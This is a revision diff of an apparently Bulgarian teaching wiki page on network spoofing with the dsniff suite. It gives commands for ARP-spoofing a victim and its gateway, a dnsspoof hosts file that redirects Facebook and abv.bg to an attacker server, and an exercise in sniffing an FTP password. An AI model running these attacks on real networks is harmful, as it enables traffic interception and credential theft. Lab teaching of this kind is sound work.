Difference between revisions of "Spoofing"
Line 50: | Line 50: | ||
== dnsspoof == | == dnsspoof == | ||
+ | 1. Създайте веб сървър. | ||
− | + | ||
+ | 2. Конфигурирайте с домайните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме. | ||
Създаване на файл. | Създаване на файл. | ||
Line 60: | Line 62: | ||
172.16.16.165 *.abv.bg | 172.16.16.165 *.abv.bg | ||
− | 2. | + | 2. Стартирайте на програмата като администратор |
~$dnsspoof -f host.new | ~$dnsspoof -f host.new |
Revision as of 13:33, 6 October 2012
Contents
dsniff
dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"
Включени инструменти:
- arpspoof - Send out unrequested (and possibly forged) arp replies.
- dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
- dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Инсталация в Убунту:
~$ sudo apt-get install dsniff
arpspoof
Пренасочване на трафика през вашата машина:
victim - машината, която ще се подслушва gateway - gateway на мрежата
стартиране на
$arpspoof -t victim gateway $arpspoof -t gateway victim
Включване на IP forwarding, иначе жертвата ще загуби свързаност
$echo 1 > /proc/sys/net/ipv4/ip_forward
Стартирайте wireshark и проверете дали атаката има успех
dnsspoof
1. Създайте веб сървър.
2. Конфигурирайте с домайните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
Създаване на файл.
~$nano host.new
Примерно съдържание.
172.16.16.165 *.facebook.com 172.16.16.165 *.abv.bg
2. Стартирайте на програмата като администратор
~$dnsspoof -f host.new
След стартиране програмата слуша за dns запитвания.
dsniff
Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата